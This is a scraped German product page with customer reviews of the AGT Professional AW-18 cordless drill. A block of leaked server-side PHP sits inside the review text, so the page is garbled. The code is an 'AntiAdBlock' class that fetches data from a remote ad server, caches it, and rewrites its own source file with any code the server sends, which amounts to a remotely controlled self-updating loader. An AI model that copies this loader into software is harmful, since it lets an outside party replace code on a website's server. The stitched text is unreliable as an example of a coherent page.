AGT Professional Akkuschrauber: Akku-Bohrschrauber AW-18 : Ein bischen schwach auf der Brust.

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2361347(); return $__aab->get();

Diesen akkuschrauber finde ich für den hausgebrauch optimal. Für die professionalität kann ich nichts sagen. Gürtelhaken finde ich sehr hilfreich, wenn man auf dem leiter ist.

Ich muss hier wirklich eine bewertung abgeben weil der schrauber ein ganz tolles produkt ist aber leider durch bewertungen von käufern die nicht lesen können oder wollen abgewertet wird. Dann noch eine schlechte bewertung abzugeben anstatt sich über den eigenen fehler zu ärgern ist wirklich gemein. Dieses angebot ist für leute gedacht die bereits irgendein gerät besitzen welches die gleichen akkus verwendet und daher nur den schrauber brauchen. Oder für leute die das set gekauft haben und der schrauber kaputt geworden ist und die akkus noch gut sind. Zum akkuschrauber selbst: er ist sehr ergonomisch gebaut, liegt gut in der hand und hat wenig gewicht. Er verfügt über ausreichend kraft um selbst grosse schrauben zu versenken. Das drehmoment ist gut einstellbar. Der einzige kleine minuspunkt: ein koffer fehlt. Insgesamt aber stimmt das preis/leistungs-verhältnis.

AGT Professional Akkuschrauber: Akku-Bohrschrauber AW-18.as, GS-zertifiziert, 18 V (ohne Akku) (Akku Bohrmaschinen)

  • Ihr Akku-Schrauber für höchste Ansprüche • Stufenlose Drehzahlsteuerung • Gummierter Griff, liegt stabil und angenehm in der Hand • Integrierte LED-Arbeitsleuchte und LED-Batterieanzeige
  • Kabelloser Akku-Bohrschrauber , ideal für leistungsstarken 18 Volt-Akku • Gummierter Griff, liegt stabil und angenehm in der Hand • Stufenlose Drehzahlsteuerung • Schraub-Drehzahl (Low): 0 – 400 U/min • Benötigt 18 V-Lithium-Ionen-Akku (bitte dazu bestellen: AGT Professional Wechsel-Akku AW-18.ak)
  • TÜV Süd: GS-zertifiziert • Integrierte LED-Arbeitsleuchte und LED-Batterieanzeige • 19 Drehmomentstufen + Bohrstufe • Bohr-Drehzahl (High): 0 – 1400 U/min • Maße: 19 x 22 x 7 cm, Gewicht: 1135 g
  • Sichere und präzise Handhabung dank Auslaufbremse • Schnellspannbohrfutter: 0,8 bis 10 mm • Drehmoment: bis 35 Nm • Rechts-/Links-Lauf • Akkuschrauber inklusive Gürtelhaken und deutscher Anleitung
  • Hinweis: Akku und Ladegerät sind nicht im Lieferumfang enthalten. Beides finden Sie hier im PEARL Online-Shop.. Akkuschrauber mit Ladegerät – Außerdem relevant oder passend zu: Schrauben, Werkzeug

Plastikreste vom guss, schalter schwergängig, aber tolle schraub – eigenschaften. Super finde ich die batteriestandsanzeige und die gut angebrachte materialbeleuchtung. Wer bereits das zubehör besitzt macht hier definitiv nichts falsch.

AGT Professional Akkuschrauber: Akku-Bohrschrauber AW-18.as, GS-zertifiziert, 18 V (ohne Akku) (Akku Bohrmaschinen) : Der akku-bohrer ist bereits für kleines geld zu haben, somit sehr gut für leute welche nicht oft damit arbeiten, denn so liegt nicht viel kapital rum, im vergleich zu einen markengerät hat er sicher schwächen, aber er kostet auch nur einen bruchteil, er hat verschiedene einstellmöglichkeiten , die led- lampe leuchtet auch exakt an die stelle wo man arbeitet, es gibt geräte die leuchten auf die hand. Ich kann den akku-bohrer empfehlen, toll ist das die akkus bei anderen geräten des herstellers auch passen, spart zusätzlich anschaffungskosten.

Hab den akkuschrauber nur bestellt, weil ich schon divere geräte von diesem hersteller hab. War positiv überrascht vom drehmoment, hat zwar nicht so viel wie mein anderer akkuschrauber aber reicht aus für ein zweitgerät.

Hatte bereits den schlagschrauber von dem modell im einsatz, der jedoch für holz-bohrarbeiten nicht geeignet ist. Darum habe ich mir noch dieses modell ohne batterie zugelegt (die ist ja das teuerste am ganzen gerät). Mit dem schnellspannfutter ist das arbeiten dann auch bequem möglich. Batteriewechsel mit einem klick, hat sich bereits sehr bewährt. Bedeutend kräftiger als bisherige ältere baumarktmodelle, bin rundum zufrieden. Schnell einsatzbereit, und liegt auch gut in der handals seltenbenutzer darf man aber das aufladen nicht verpassendas arbeitsergebnis steht unnd fällt nun mit der qualität der verwendeten bit und bohrer.

Bin mit dem akkuschrauber bisher zufrieden, praktisch ist die high/low funktion, damit hat der schrauber z. In der low stellung mehr kraft. Mit meinem 4000er akku ist der schrauber jedoch sehr schwer. Die bürstenlose geräte sind im betrieb recht laut.

Das gerät ist einfach in der handhabung und vollfunktionsfähig. Ich bin vollkommen zufrieden mit dem produkt und kann es nur weiter empfehlen.

Nach ein paar monaten bei täglicher nutzung komme ich zu folgendem ergebniss: das drehmoment ist zu mager für eine 18v maschine. Die akkus sind schnell leer. Im vergleich mit einer makita mit 12v und einem 2 ampere akku, ist die makita maschine handlicher und kraftvoller. Die agt ist preislich ein wenig günstiger. Nur volt und ampere zu vergleichen bringt leider nichts. Und li-ion alleine sagt leider auch nichts über die qualität aus. Für den gelegenheits hobby-bastler aber ausreichend.

Eigentlich bin ich besitzer von nur “bosch” werkzeugen. Oftmals auch blaue bosch,nur warum kaufe ich dann dieses billig produkt?. Nun ganz einfach, meine frau mag bosch auch und somit ist mein bosch akkuschrauber im hausimmer auf wanderschaft und wenn man mal schnell in der werkstatt etwas machen möchte muss man das werkzeug erst einmal suchen. Der preis ist top und die leistung ist der hammer. Akku läd sehr schnell und ist kraftvoll.

Ich habe den akku bohrschrauber gestern bekommen und natürlich gleich ausprobiert. Meine erfahrungen beinhalten da natürlich keine langlebigkeit des artikels. Der schrauber liegt gut in der hand und ist dem preis entsprechend leistungsfähig und man darf ihn auch nicht mit eine profischrauber vergleichen,den kann er nicht das wasser reichen,deshalb sage ich, wer etwas zum täglichen gebrauch haben will sollte mehr ausgeben,aber um ein paar löcher in metall oder holz zu bohren reicht er. Ich habe schon einige werkzeuge von agt professional und besitze daher auch akkus. Das einzige was mich an allen werkzeugen von agt mit links-rechts umschalter stört ist ,das er immer etwas hakelig ist. Das bohrfutter kann bis zu 10mm bohrer aufnehmen und hält sie auch ordentlich fest. Der schrauber besitzt auch eine beleuchtung und akkustandsanzeige. Wer also schon ein ladegerät und akku von agt besitzt kann für den preis eigentlich nichts falsch machen. Wenn er doch vorzeitig schlapp machen sollte,er hat ja garantie. Ich habe den schlagschrauber zum testen vergünstigt erhalten.

Habe mir diesen akkuschrauber gekauft, weil mein alter bosch (professional serie) kaputt gegangen ist und ich kurzfristig einen brauchte. Und was soll ich sagen; ich bin positiv überrascht: der schrauber funktioniert tadellos. Der li-ion akku liefert bis zum schluss volle kraft. Und die kleine arbeitsleuchte am gerät ist tatsächlich sehr nützlich, wenn man an dunklen stellen etwas bohren oder schrauben muss. Also von mir gibt es eine klare kaufempfehlung für alle hobbyschrauber.

Man bekommt hier für wenig geld einen guten akkuschrauber für den alltag. Er ist leistungsstark und der akku hält gut durch.

Top qualität, schnelle lieferung.

Summary
Review Date
Reviewed Item
AGT Professional Akkuschrauber: Akku-Bohrschrauber AW-18.as, GS-zertifiziert, 18 V (ohne Akku) (Akku Bohrmaschinen)
Rating
2,0 of 5 stars, based on 18 reviews

Ein Kommentar

Kommentare sind geschlossen.